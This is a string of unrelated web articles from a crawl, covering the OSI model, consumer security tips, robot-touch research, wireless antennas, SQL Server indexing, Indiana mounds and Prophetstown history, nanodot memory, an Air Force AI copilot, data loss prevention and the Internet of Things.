- Physical Layer – They Physical Layer converts data into streams of electric or analog pulses- commonly referred to as “1’s and 0’s.” Data is broke down into simple electric pulses, and rebuilt at the receiving end.
- Data Link Layer – The Data Link layer provides an interface with the network adapter, and can also perform basic error checking. It also maintains logical links for subnets, so that subnets can communicate with other parts of the network without problem.
- Network Layer – Much like the Transport Layer of the TCP/IP model, the Network Layer simply supports logical addressing and routing. The IP protocol operates on the Network Layer.
- Transport Layer – Since we left out the error and flow control in the Network Layer, we introduce it into the Transport Layer. The Transport Layer is responsible for keeping a reliable end-to-end connection for the network.
- Session Layer – The Session Layer establishes sessions between applications on a network. This may be useful for network monitoring, using a login system, and reporting. The Session Layer is actually not used a great deal over networks, although it does still serve good use in streaming video and audio, or web conferencing.
- Presentation Layer – The Presentation Layer translates data into a standard format, while also being able to provide encryption and data compression. Encryption or data compression does not have to be done at the Presentation Layer, although it is commonly performed in this layer.
- Application Layer – The Application Layer provides a network interface for applications and supports network applications. This is where many protocols such as FTP, SMTP, POP3, and many others operate. Telnet can be used at this layer to send a ping request- if it is successful, it means that each layer of the OSI model should be functioning properly.
Now, the Bad News
Now that we’ve reviewed each layer, you have to commit each layer and its function to memory. Most networking exams require that knowledge of each layer be present. We realize that remembering seven different layers is tough- so we use a mnemonic. A mnemonic is simply a tool we can use to remember all seven layers. Look at each beginning letter of each layer- it’s PDNTSPA, starting with the Physical Layer. You could come up with a phrase such as “Please Do Not Throw Sausage Pizza Away,” to help you remember each layer name.
It is important to remember that each layer is a standard- not an implementation. This means that not all network communication will necessarily use each layer. We partly covered this with the Session Layer, which isn’t always necessarily used. Some devices such as routers only operate at the third layer and below. Some devices are even more limited- repeaters only work at the physical layer of the OSI model.
The OSI and TCP/IP model are fairly prevalent in networking- don’t be surprised if you see them more than you’d like. If you take anything from this section, remember to use a pneumonic to memorize each layer name in order. You can get as crazy as you’d like with the phrase you use, but “Please Do Not Throw Sausage Pizza Away” is generally the easiest to remember.
In the next article, we will be specifically looking at how data moves from one computer to another- and how it moves through the OSI model. Don’t worry if this seems new to you and you don’t quite take all of it in, simply review it some more and move on to the next section. And, as always, you can review the previous section if you didn’t quite grasp all the concepts in this one. | <urn:uuid:eaaa3b06-48c8-4233-bcb0-7e85b1e75645> | CC-MAIN-2022-40 | https://www.itprc.com/the-tcpip-stack-and-the-osi-model/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00787.warc.gz | en | 0.922457 | 1,586 | 4.28125 | 4 |
When it comes to today’s digital and mobile world, you can never be too safe. The world is being more digitized and connected, leaving organizations and consumers alike potentially exposed from looming advanced threats. In 2017 alone the world faced some of the biggest security breaches including Equifax, Yahoo and WannaCry just to name a few. These breaches have resulted in the majority of Americans’ personally identifying information being stolen, not to mention a significant portion of the rest of the world. Of note, a large percentage of these data breaches were attributed to compromised credentials. Over the last few years, data breaches have been steadily rising in both size and severity, and the security measures that firms are taking aren’t stemming the tide. A recent report (opens in new tab) from Cybersecurity Ventures found that the number of businesses falling victim to attacks rose by 21 percent in the U.S. last year, and doubled in the UK in the past two years.
Hackers are always working on new and unexpected ways to steal our private data, and a simple PIN or password on a smartphone just isn’t enough to ensure that our information is secure. While newer authentication methods like biometrics are becoming more mainstream, passwords are still the primary way people access their accounts. Despite the commonly known rule to vary account passwords, the majority of people use the same password for more than one account.
These days, people are storing personal information online much more so than in the past. Consumers use mobile apps and websites to do almost everything – from banking to interacting with friends and family on social media. Even accessing sensitive data like their health records is done on a digital platform. Couple that with the explosion of websites and apps is the increasing concern consumers have about the security of their data. A 2017 study by Gigya (opens in new tab) found that more than two-thirds of adults are concerned about security and privacy, while 68 percent say they don’t trust companies to handle their personal data properly.
To combat these concerns, here are four tips to better prepare against threats in an unsafe world:
1. Education is Power
Hackers aren’t just targeting consumer-focused businesses. Banks, healthcare organizations, and government agencies are also prime targets for data breaches. Furthermore, massive breaches like those at Equifax and Yahoo have already resulted in the private information of billions of people being leaked online. As a consumer, you are the strongest line of defense. It is vital to a take proactive, ongoing approach to educate yourself on the implications of hacks. Simple things like checking your bank statement regularly or shredding sensitive mail can reduce the likelihood of a breach caused by human error.
2. Embrace Multi-Factor Authentication
Passwords are comprised of an assortment of letters, numbers, and symbols. Unfortunately, no matter how complex or unique, passwords can no longer protect you. While most people use easy-to-crack passwords such as “123456,” many people use the same password for all their online accounts, which is the same thing as having one key for the house, car, safety-deposit box, and office. A consumer survey commissioned by Veridium found that 50 percent of respondents use the same password for up to 10 personal accounts. This creates a single point of failure if the wrong person were to crack it, and information can be exploited with devastating results. Passwords are also inconvenient to remember, considering that we now need them for so many actions in our daily lives.
To achieve safety, best practices dictate moving beyond passwords and embracing multi-factor authentication. This includes using biometrics. Capturing your biometrics via a smartphone optimizes security while remaining convenient to use throughout the day.
3. Change your Social Media Behavior
In today’s age, social media is a common platform for consumers to overshare private information. Although people of all ages are guilty of oversharing, it is especially a concern with younger generations who are often unaware of the consequences. Every time a consumer shares their location, answers an online quiz, talks about their pet dog, or wishes someone a happy birthday, they are giving hackers clues to what their passwords or answers to their security questions might be.
Security experts warn that this oversharing of personal information is contributing to the widespread reports of data breaches and hacked social media accounts. Even if you do not fall victim yourself, oversharing may come back to haunt you tomorrow. Next time you are online, be mindful of what you are sharing and posting on your social media channels.
4. Safeguard your Data
Even though technology and hackers are becoming more advanced, many people still do not take appropriate steps to safeguard their data – despite most saying they are concerned about protecting their information. Forty-seven percent of online shoppers said they stored some or all of their credit-card information on retailer websites for quick and easy access to their accounts, and yet 40 percent of online shoppers stated that they have not changed their password in the past year.
Whether through targeted phishing attacks or database hacks that leak millions of usernames and passwords out onto the web, there's no reason to suspect that this hacking danger will end anytime soon. Come to terms that you will, at some point, get hacked. Your personal identity will be stolen. It’s not an “if,” but a “when.”
Luckily, there are steps that you can take to protect yourself. Many people think that they can’t do anything to protect their digital lives, but in many ways, smartphones, digital mentalities, and the availability of multi-factor authentication tools demonstrate the power of biometrics for protecting consumers.
There is an ongoing debate on whether people are trading privacy and security in exchange for convenience and free services, especially now that we, as consumers, store so much of our personal information on smartphones and on cloud services. As a result, corporations and consumers have been searching for a safe and easy way to protect personal information. Many are taking steps toward replacing passwords, PINs, tokens, and even usernames with biometrics.
In an increasingly digital world, with more private data being stored on mobile devices and in the cloud, the need for ironclad security is paramount. Using your biometrics – your unique traits or behavioral characteristics – to prove identity safeguards your most valuable assets in a way that’s both convenient and secure.
James Stickland, CEO of Veridium (opens in new tab)
Image Credit: Welcomia / Shutterstock | <urn:uuid:6c03b62c-4aba-4f48-a56e-d550cc252262> | CC-MAIN-2022-40 | https://www.itproportal.com/features/keeping-your-identity-safe-in-a-hackers-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00187.warc.gz | en | 0.945993 | 1,340 | 2.828125 | 3 |
Humans didn't evolve in an environment full of machines, and as a result we have a lot of instinctive reactions to robots that mirror our reactions to other humans. Studies have shown that people have a hard time being rude to a robot's face, just as we do with other people. We even use the same part of our brains to recognize robot and human faces. A research group at Stanford recently wondered if our instinctive reactions to robots would extend to the way we touch their bodies. And they did a series of tests in which subjects were asked to touch robots in "accessible" regions like the hands and then "inaccessible" ones like the buttocks and genitals.
The researchers will present the results of their work this week at the Annual Conference of the International Communication Association in Fukuoka, Japan. They wanted to focus on people's reactions to touch because there is already a large body of evidence showing that humans have complex reactions to touching each other, ranging from emotions to physiological changes we aren't always aware of. As robots take on the roles of caretakers, workplace helpers, and service workers, it's important to explore whether touch should be incorporated into how we design robot interfaces. But first, we need to understand whether humans react to robot touch the way they react to human touch.
To answer that question, the researchers used a human touching scale developed back in the 1960s by Sidney Jourard. Jourard used the term "body accessibility" to rank body parts based on how willing people were to allow others to touch them. As the researchers wrote:
The most accessible regions of the body were the hands, head, and arms while the least accessible region was the genitals. Does the concept of body accessibility extend to robots? If people perceive a robot as simply being a device that can be touched, we would expect no difference in response when touching one part of its body versus another, particularly if its body is of uniform texture and material. If people perceive a robot using a social lens, we would anticipate that touching low accessibility regions would elicit an emotional response associated with greater intimacy between the person and the robot.
The researchers brought study participants into a room with a small humanoid robot (Aldebaran Robotic’s NAO), who was sitting on a table. The robot was programmed to ask participants to touch 12 different parts of its body. Meanwhile, the participants were also wired up to a sensor that tested their skin conductivity. Copious research has already demonstrated that humans' skin becomes more conductive when we're "emotionally aroused." Keep in mind that emotional arousal isn't the same thing as sexual arousal—it simply refers to any strong emotional reaction, from anxiety to desire, that can be measured physiologically.
This robot touching test was designed to determine whether people would have emotional reactions to touching "low accessibility" regions on the robot, like buttocks and genitals.
Not only did study participants have an emotional reaction to touching the robot's inaccessible regions, but they also took fractions of a second longer to touch those parts as well. On an unconscious, instinctual level, humans were reacting to this little humanoid robot as if it were another person. The researchers explain:
These responses are not simply an act of playing along—they occur on a deeper physiological level. People are not inherently built to differentiate between technology and humans. Consequently, primitive responses in human physiology to cues like movement, language, and social intent can be elicited by robots just as they would by real people.
Though there are about a million jokes to be made about this study, the findings are actually quite important. They provide a major insight into UX design for roboticists, especially ones who want to build social robots that will interact with people. Knowing that humans will have unconscious reactions to robots similar to those they have to humans could help in a variety of situations. A gentle touch from a robot could be reassuring. Hugging a robot might trigger physiological reactions that are calming. Touching a robot could also trigger discomfort and even violence.
Jamy Li, one of the researchers who conducted the study, said in a release, "Our work shows that ... people respond to robots in a primitive, social way. Social conventions regarding touching someone else's private parts apply to a robot's body parts as well." This raises the question of what happens when a robot touches a human in an inaccessible body part. Maybe that will mean some robots get a punch in the face. Or they'll be welcomed in a way that hints at the future role of robots in the adult industry. | <urn:uuid:9458a665-9a64-460d-b99b-c881c9c09189> | CC-MAIN-2022-40 | https://arstechnica.com/gadgets/2016/04/how-would-you-feel-if-a-robot-asked-you-to-touch-its-buttocks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00187.warc.gz | en | 0.968351 | 927 | 3.5625 | 4 |
New Training: Troubleshooting Wireless Networks
In this 4-video skill, CBT Nuggets trainer Jeremy Cioara teaches you how to troubleshoot common wireless connectivity and performance issues. Watch this new networking training.
Watch the full course: CompTIA Network+
This training includes:
28 minutes of training
You’ll learn these topics in this skill:
Troubleshooting Wireless: The Nature of Airwaves
Troubleshooting Wireless: Fighting Frequencies
Troubleshooting Wireless: Understanding Antenna Types
Troubleshooting Wireless: Misconfigurations
Radio Communication Requires Different Types Of Antennas For Different Jobs
Wireless networking can be more difficult in some ways than a traditional wired network to maintain and troubleshoot. That's due to the nature of how wireless network-equipped devices have to communicate with each other. Controlling radiowaves can be much more difficult than controlling the electrons being pushed through a copper wire. So, IT pros will need to understand the different types of antennas that wireless network equipment can use and which type of antenna is best for each use case.
For example, a typical wireless router found inside a consumer's home uses an antenna that spreads a WiFi signal out like a flat ball. This ensures that WiFi signals are spread as evenly throughout the home as possible.
On the other hand, if a farmer needs to shoot a WiFi signal to an IoT device on a piece of farm equipment across a field, they might use an antenna that focuses that WiFi signal more like a shotgun blast. With these types of antennas, the WiFi signal does become more spread the longer it travels, but it is focused in a single direction. This type of antenna allows radio waves to travel a longer distance at the cost of coverage.
There are other types of antennas as well. Likewise, there are ways of controlling interference and spread for the various types of antennas, too. IT pros will need to understand what types of antennas are available for radio equipment and how each antenna works to pick the right one for the job. Different types of radio equipment will have different antenna requirements, too, so a Yagi antenna meant for a WiFi network may not work for a communications device like a CB radio. IT Pros will need to understand those differences as well. | <urn:uuid:4b0cf256-6e24-460b-9a4d-4e599f832fc0> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/new-skills/new-training-troubleshooting-wireless-networks | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00187.warc.gz | en | 0.920662 | 470 | 2.859375 | 3 |
Don’t believe everything you read on the web about clustered vs. nonclustered indexes
I suspect almost every reader of this article has seen or heard the following, as it is posted “everywhere” on the web. Yet if the advice is taken blindly, it can rob your system of top performance.
- Every table should have a primary key (good idea)
- Every table should have a clustered index (good idea)
- Every table should have a primary key that is a single column, integer, identity key (not a bad idea, but too simplistic to take without a grain of salt)
- Every primary key should be a clustered index (herein lies the rub, and the focus of this article)
First, a few facts. Any index may be clustered or nonclustered, but you can have only one clustered index per table (this is one important reason to think carefully before choosing your clustered index). A primary key is instantiated with an index, but this does not have to be a clustered index. This last note surprises more than a few folks, but has been true at least since SQL 4.0 running on OS/2 (anybody remember that one?).
Let’s start with clustered vs. nonclustered indexes.
Clustered indexes are b-tree indexes whose leaf level is the data page of the table; hence, the data pages are physically sorted in index order (this is mostly true, and you can act and tune as if it is completely true).
Nonclustered indexes are also b-tree indexes, but the leaf level is standard, and contains pointers to the data pages.
Let’s do this graphically:
Presume this is a “customer” table which is clustered on the customer’s last name. The data pages become physically sorted by last name at index creation time. Then, further index levels are built out as follows:
While (number of pages in the index level) > 1
Create a new index level
Copy the first entry from each page of the prior level
In the above, simplistic example, we have three levels of index, with the first index level being the data (this is unique to the clustered index).
Finding a row in the table via a b-tree structure, we start in the root page. Now find rows whose key is the last name “Baker.”
We start at the root page, and see that “Baker” is between “Albert” and “Jones” by following the “Albert” pointer to the next level. Then we see that Baker is between “Albert” and “Brown” by following the “Albert” pointer yet again. Now, we find ourselves on the data page, and have done so using three page requests.
Since you can have only one clustered index (because you can only sort the data one way), all other indexes will be nonclustered.
Nonclustered index graphically:
This graphic represents an index on the customer’s first name. The nonclustered index build starts a bit differently than the clustered, as the data is sorted on last name, not first name.
The first index level will have an entry for every row of data (vs. every page of data for the clustered index). So, 1 million customers, 1 million index entries.
The rest of the nonclustered index levels are built the same way the clustered index levels are built.
So, looking for all the “Amy” entries: Amy is between Amy and George, so we follow the Amy pointer to the next level. Amy is between Amy and Bob, so we again follow the Amy pointer. Now we are on the nonclustered index level leaf page and have the list of row IDs that we will use to identify all the Amys. We’re still not done, though, because for each matching entry, we still need to retrieve the matching rows.
Doing some math:
Finding Baker cost us three page requests. Finding Amy cost us three page requests plus one for each entry, which gets us five page requests. When we start diving into this, we see that if we want multiple rows, the clustered index performs much better.
For example, if there are 50 Bakers to retrieve: possibly still three I/Os, possibly four if they run over to the next page. If there are 50 Amys, then it’s three I/Os to get to the leaf level, then 50 more page requests to retrieve the rows, for a total of 53.
(Compared to a table scan, I’ll still prefer the index!)
Now, let’s talk about a simple join, say an invoice header to an invoice detail. Let’s further speculate that there’s an average of 50 detail rows per header.
If you have a nonclustered index on the detail, you have 50 page requests to perform after you have reached the right index page. If you have a clustered index on the detail, you may have no more of this to deal with, or you may need to simply read the next page on the chain.
In short, for simple joins, joining on a clustered index is dramatically faster than joining on a nonclustered index.
As the joins become more complex (say, a three table join), keep multiplying by 50 with each level.
Refer back to the nonclustered index, and look at the index pages, which are in fact chained together.
Doesn’t that list look remarkably like the base page of the clustered index? In fact, think about a different query: select count(*) from the table where first_name = ‘Amy.’
Now we don’t have to read the extra pages, as the data we want is directly on the index page. The optimizer is aware of this, and the DBMS picks the data right off of the index page. This is called “index covering.”
Index covering is the one time that the nonclustered index may be faster than the clustered index, as more entries are likely to fit on an index page (entry width) than on the data page (full row width). In fact, it’s common to add columns to nonclustered indexes for this very reason. If all columns referenced in a query (where clause, join clauses, select list) are in the index, the server will not bother reading the data pages.
Don’t drink the Kool-Aid.
Don’t choose indexes based upon white papers you’ve read. Choose indexes based upon your knowledge of how the optimizer chooses indexes, and what it can do with them.
The Kool-Aid trademark is the exclusive property of Kraft Foods, Inc. All other trademarks the property of their respective owners. | <urn:uuid:30c99e96-85f5-45dd-b144-ed10d44f2efa> | CC-MAIN-2022-40 | https://logicalread.com/dont-drink-kool-aid/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00187.warc.gz | en | 0.90955 | 1,464 | 2.9375 | 3 |
Yost Woodland Mounds
This site is on a bluff above the Tippecanoe River just
about 285 meters from that river, and 980 meters from where
it flows into the Wabash river.
The site is between the small town of Battle Ground
and the smaller settlement of Americus,
northeast of Lafayette and West Lafayette, Indiana.
The Yost Woodland complex has been designated as sites 12-T-925, 12-T-1083, and 12-T-1119 in the 2006 report Archaeological Investigations at Site 12-T-59 and Two Other Locations in Prophetstown State Park, Tippecanoe County, Indiana. That was written by Michael Strezewski of the Indiana University — Purdue University campus in Fort Wayne. He's now a faculty member at the University of Southern Indiana in Evansville.
In that paper Strezewski writes:
Materials identified at 12-T-925 were all non-diagnostic prehistoric artifacts, and consisted of seven chert flakes and five pieces of fire-cracked rock. Small quantities of prehistoric, non-diagnostic artifacts were also recovered from sites 12-T-1083 and 12-T-1119.
Was this site abandoned before the first Europeans arrived in the area? Possibly not. The French were active in the area almost a century before the British-derived U.S. forces showed up.
The settlement of Waayaahtanonki was occupied by the Wea tribe. The early French traders spelled it as Ouiatenon. The settlement was on the southeast shore of the Wabash river twenty-nine kilometers downstream of where the Tippecanoe river flowed into the Wabash river, in today's western Tippecanoe County. At the time Europeans considered the area to be New France. The French built a fortified trading post in 1717, Fort Ouiatenon, on the opposite bank of the river. In 1760 the French agreed to withdraw from the Wabash river valley and cede the area to British control.
In 1791 U.S. President George Washington had his Secretary of War issue orders for Brigadier General Charles Scott of Kentucky to lead a mission to kill the Wea people. Scott's force of 33 officers and 760 mounted Kentucky volunteers arrived on June 1, 1791, and killed as many men as they could, taking 41 women and children prisoner. They burned the town and several hundred acres of corn. The Americans had arrived.
Go out Pretty Prairie Road northeast from Battle Ground, pass the golf club and turn into the residential Indian Mount Drive, and continue toward its end.
It ends by splitting into two fairly short driveways. Stop before going that far. Pull off under the trees by the last sharp turn to the right and walk from there. If it hasn't been raining to soften the ground, you can easily and safely pull off there, and then turn around without going to the driveways at the end. The number of "Neighborhood Watch" signs made me think the locals might be rather sensitive about turning around in their driveways.
The mounds will be to your left, to the southeast of the road, between the road and the trees.
There are four mounds along the southeast side of the road, about a meter to a meter and a half tall.
Below is the view from that last turn, looking southwest. There are four obvious mounds. The first three are in the sunlight, the fourth at the far end is in the shadows of the trees. Let's call them #1, #2, #3, and #4 with #1 the closest, at the northeast end, and #4 at the southwest end, farthest from us
Here are #3 and #4 toward the southwest end, #3 in the sun and #4 mostly shadowed.
Here I'm looking straight southeast from the road to #4.
Turning around and looking northeast, from right to left here are #3, #2, and, barely visible, #1.
A close-up of just #3.
Here are #2 right of center, and #1 left of center directly in front of the white house. Between them, a ravine leads down toward the Tippecanoe River.
Here were can see a little more of the rather subtle #1 and the beginning of the ravine.
Tecumseh or Tecumthé in the traditional pronunciation was born between 1764 and 1771 in today's Ohio. He was born into the Panther clan of the Kispoko division of the Shawnee tribe.
The American Revolutionary War ended in 1783, and the new United States claimed the land north of the Ohio River by right of conquest, thinking that it was theirs because they had defeated the British, who had claimed it while ignoring the people who had been living there for millennia. From then until 1798, Tecumseh moved around along the Ohio River and the areas that became the states of Ohio, Indiana, Kentucky, Missouri, and Tennesee. By 1798 Tecumseh was both civil and military leader of a Kispoko band of about 50 warriors and 250 other people. They settled then along the White River near today's Anderson, Indiana.
The native people in the area were suffering from European diseases, alcoholism, poverty, and the loss of their land and their way of live. Several religious prophets emerged, offering explanations and remedies for the native people's crisis. One of these was Tecumseh's younger brother Lalawéthika. In 1805 he became a healer in their village, and began preaching the ideas espoused by earlier holy men, including the Delaware prophet Neolin.
Lalawéthika urged the native people to reject European influences, stop drinking alcohol, eat only Native food, and wear traditional Shawnee clothing.
Lalawéthika became known as the Shawnee Prophet, and he and Tecumseh founded a new town near the ruins of Fort Greenville in today's Ohio, where a 1795 treaty strongly in favor of the English invaders had been signed. It attracted visitors and converts from several different tribes.
In 1808 Tecumseh and the Prophet established a settlement northeast of today's Lafayette, Indiana. The Prophet, Lalawéthika, had adopted a new name, Tenskwatawa, meaning The Open Door, the door through which followers could achieve salvation. The settlement, which Europeans would call "Prophetstown", attracted followers from several tribes — Shawnee, Potawatomi, Kickapoo, Wyandot, Winnebago, Sauk, Ottawa, Iowa, and others. Up to 6,000 of the Prophet's followers settled in the area, making Prophetstown larger than any European city in the region.
Tecumseh and Tenskwatawa initially tried to maintain a peaceful coexistence with the United States. But in September 1809 William Henry Harrison, the Governor of the Indiana Territory, negotiated the Treaty of Fort Wayne. Europeans paid to purchase 10,000 to 12,000 square kilometers of land in today's Indiana and Illinois. Many native leaders signed the treaties, but others had been intentionally excluded.
Up to this point, Tecumseh was known to Europeans, if he was known at all, as "the Prophet's brother". But the Treaty of Fort Wayne put Tecumseh and his alliance of tribes on the path to war with the United States.
Through 1811 Tecumseh had meetings with Harrison, and traveled widely with meet with other tribal leaders. C1811 F1 or the Great Comet of 1811 and the New Madrid Earthquake of December 1811 before and after the coming battle provided mystical support to Tecumseh's message. The first was a comet visible to the naked eye for around 260 days. The second was an earthquake with a moment magnitude of 7.2 to 8.2, followed the same day by an aftershock with a moment magnitude of 7.4. It was felt strongly throughout the central and eastern United States, and moderately throughout an area of nearly 3 million km2.
The tensions led to the Battle of Tippecanoe on November 7, 1811, a genocidal affair in which Harrison achieved his goal of utterly destroying Prophetstown.
Prophet's Rock is an outcropping where Tenskwatawa, The Prophet, exhorted the community's inhabitants to resist the European forces.
Harrison had sent a series of letters to Tenskwatawa with a number of demands.
Tecumseh was away from Prophetstown recruiting followers from the Muscogee and Choctaw tribes.
Harrison moved his forces north from the southern Indiana territory, camping near Prophetstown on November 6. In a council that night, Tenskwatawa agreed on a pre-emptive strike. He said that he would cast spells to protect his warriors and confuse Harrison's.
Tenskwatawa's warriors surrounded Harrison's camp, and the gunfire started about 4:30 AM. The element of surprise was lost, and the native warriors attacked in a disorganized fashion.
The next day, Harrison sent a group to inspect Prophetstown. They found that it was deserted except for one elderly woman who had been too sick to flee. Harrison issued orders to burn the town, including food stores of 5,000 bushels of corn and beans, and to dig up the town's cemetery and scatter the buried bodies.
The first of the series of severe New Madrid earthquakes struck on December 16. Many tribes interpreted them as a sign of Tenskwatawa's power, as "a call to action". Attacks against European settlers and outposts in the Indiana and Illinois territories increased significantly.
Tecumseh remained a significant military figure on the frontier through the War of 1812 when his confederacy was allied with the British. He was killed the following year in a battle.
Prophet's Rock isn't a single rock or a formation of several large rocks. It's an outcropping mostly consisting of a conglomerate of small to medium pebbles. I'm sure it has changed significantly since Tenskwatawa's time.
Sure enough, here's what it looked like in 1902. This photograph is in the U.S. Library of Congress collection. The trees have grown over and around Prophet's Rock.
Harrison ran for U.S. President in 1840, winning the election along with his Vice-President John Tyler. His campaign used the slogan "Tippecanoe and Tyler, too".
Harrison only lived for 31 days in office, the shortest U.S. Presidential term so far. His inauguration was on a cold and windy day, and he stood out in the weather to deliver the longest inaugural address to date, some 8,445 words long. He later developed a cold, which worsened into pneumonia, and then he died. | <urn:uuid:3ab00059-6a51-44e3-a06e-9f49ffb25a21> | CC-MAIN-2022-40 | https://cromwell-intl.com/travel/usa/earthworks/yost-woodland/Index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00187.warc.gz | en | 0.973557 | 2,272 | 3.5625 | 4 |
A new type of memory is being trialled by researchers at the Taiwan National Nano Device Laboratories and University of California, Berkeley, that is able to write and erase data at 100 times the rate of current generation flash memory.
Described as "ultrafast metal-gate silicon quantum-dot (Si-QD) non-volatile memory (NVM)," it's made up of a 3nm in diameter layer of silicon nanodots. When combined with a metallic controller layer it is essentially, a storage medium. A precise laser is used to charge or remove charge from the dots, making each of them the equivalent of a single bit.
Portable storage and solid state drives have seen big jumps in speed and papacity in recent years thanks to advances in flash. Suddenly making a jump to 100 times the current rate would certainly cause bottlenecks somewhere along the line.
One of the researchers from the Taiwanese research centre has been speaking about the development: "Our system uses numerous, discrete silicon nanodots for charge storage and removal. These charges can enter (data write) and leave (data erase) the numerous discrete nanodots in a quick and simple way. The materials and the processes used for the devices are also compatible with current main-stream integrated circuit technologies."
The fact that contemporary computing could make use of the nanodots as it currently is, is quite an exciting idea.
Source: Hexus (opens in new tab) | <urn:uuid:9ed104e5-532a-4353-ac25-2063c2e2db99> | CC-MAIN-2022-40 | https://www.itproportal.com/2012/04/19/nanodot-memory-is-super-fast/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00187.warc.gz | en | 0.937628 | 297 | 3.3125 | 3 |
The AI algorithm, called ARTUu, was in charge of tactical navigation and sensor employment during a simulated missile strike as part of a reconnaissance mission. The algorithm used the aircraft’s radar in detecting enemy launchers, while the pilot was responsible for finding hostile aircraft.
The pilot transitioned the sensor control to the AI algorithm after liftoff. During the flight, the algorithm operated the sensor using learned insights from more than 500,000 computer simulated training iterations.
“ARTUu’s groundbreaking flight culminates our three-year journey to becoming a digital force,” said Will Roper, assistant secretary of the Air Force for acquisition, technology and logistics and a three-time Wash100 Award recipient, “Putting AI safely in command of a U.S. military system for the first time ushers in a new age of human-machine teaming and algorithmic competition. Failing to realize AI’s full potential will mean ceding decision advantage to our adversaries.”
Researchers at Air Combat Command’s U-2 Federal Laboratory developed and trained the AI algorithm to carry out in-flight tasks. | <urn:uuid:79248219-7bf6-4ce8-bcc6-13ab1b5cd378> | CC-MAIN-2022-40 | https://executivegov.com/2020/12/air-force-advances-human-machine-teaming-with-ai-algorithm-aboard-u-2-aircraft-will-roper-quoted/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00187.warc.gz | en | 0.940247 | 232 | 2.546875 | 3 |
Data Loss Prevention is a set of procedures and mechanisms to stop sensitive data from leaving a security boundary. This helps you hold onto your important data and information so you do not lose it or have it end up in the wrong hands.
Data Loss Prevention is often performed on email services because this is one of the most prevalent and likely sources of data exfiltration in businesses today.
What Does This Mean For An SMB?
Your business needs to take proactive measures today to first reduce its chances of being hit by ransomware, phishing, or other cybersecurity attacks. Secondly, validate backups and disaster recovery plans are current and functioning in case you end up hit with ransomware. CyberHoot recommends the following best practices to avoid, prepare for, and prevent damage from these attacks:
- Adopt two-factor authentication on all critical Internet-accessible services
- Adopt a password manager for better personal/work password hygiene
- Require 14+ character Passwords in your Governance Policies
- Follow a 3-2-1 backup method for all critical and sensitive data
- Train employees to spot and avoid email-based phishing attacks
- Check that employees can spot and avoid phishing emails by testing them
- Document and test Business Continuity Disaster Recovery (BCDR) plans
- Perform a risk assessment every two to three years
Start building your robust, defense-in-depth cybersecurity plan at CyberHoot.
Source: Liu, S., & Kuhn, R. (2010, March/April). Data loss prevention. IEEE IT Professional, 11(2), pp. 10-13. | <urn:uuid:11cb35b2-d425-4089-9f09-745a78d59ae4> | CC-MAIN-2022-40 | https://cyberhoot.com/cybrary/data-loss-prevention/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00388.warc.gz | en | 0.908621 | 327 | 2.828125 | 3 |
IoT - Bridging the Gap between Virtual and Physical World
The Internet of Things represents a vision in which the Internet extends into the real world embracing everyday objects. Physical items are no longer disconnected from the virtual world, but can be controlled remotely and can act as physical access points to Internet services. An Internet of Things makes computing truly ubiquitous. This development is opening up huge opportunities for both the economy and individuals.
The Internet of Things vision is grounded in the belief that the steady advances in microelectronics, communications and information technology we have witnessed in recent years will continue into the foreseeable future. In fact, due to their diminishing size, constantly falling price and declining energy consumption– processors, communications modules and other electronic components are being increasingly integrated into everyday objects today.
IoT has evolved from the convergence of wireless technologies, micro-electromechanical systems (MEMS), micro-services and the Internet. The convergence has helped tear down the silo walls between operational technologies (OT) and information technology (IT), allowing unstructured machine-generated data to be analyzed for insights that will drive improvements. “Smart” objects play a key role in the Internet of Things vision, since embedded communication and information technology would have the potential to revolutionize the utility of these objects. Using sensors, they are able to perceive their context, and via built-in networking capabilities they would be able to communicate with each other, access Internet services and interact with people. “Digitally upgrading” conventional object in this way enhances their physical function by adding the capabilities of digital objects, thus generating substantial added value. Forerunners of this development are already apparent today – more and more devices such as sewing machines, exercise bikes, electric toothbrushes, washing machines, electricity meters and photocopiers are being “computerized” and equipped with network interfaces.
In other application domains, Internet connectivity of everyday objects can be used to remotely determine their state so that information systems can collect up-to-date information on physical objects and processes. This enables many aspects of the real world to be “observed” at a previously unattained level of detail and at negligible cost. This would not only allow for a better understanding of the underlying processes, but also for more efficient control and management. The ability to react to events in the physical world in an automatic, rapid and informed manner not only opens up new opportunities for dealing with complex or critical situations, but also enables a wide variety of business processes to be optimized. The real-time interpretation of data from the physical world will most likely lead to the introduction of various novel business services and may deliver substantial economic and social benefits.
The Internet of Things is not the result of a single novel technology; instead, several complementary technical developments provide capabilities that taken together help to bridge the gap between the virtual and physical world. These capabilities include:
- Communication and cooperation
- Embedded information processing
- User interfaces
While the possible applications and scenarios outlined above may be very interesting, the demands placed on the underlying technology are substantial. Progressing from the Internet of computers to the remote and somewhat fuzzy goal of an Internet of Things is something that must therefore be done one step at a time. In addition to the expectation that the technology must be available at a low cost if a large number of objects are actually to be equipped, we are also faced with many other challenges, such as:
- Arrive and operate
- Software complexity
- Data volumes
- Data interpretation
- Security and personal privacy
- Fault tolerance
- Power supply
- Interaction and short-range communications
- Wireless communications
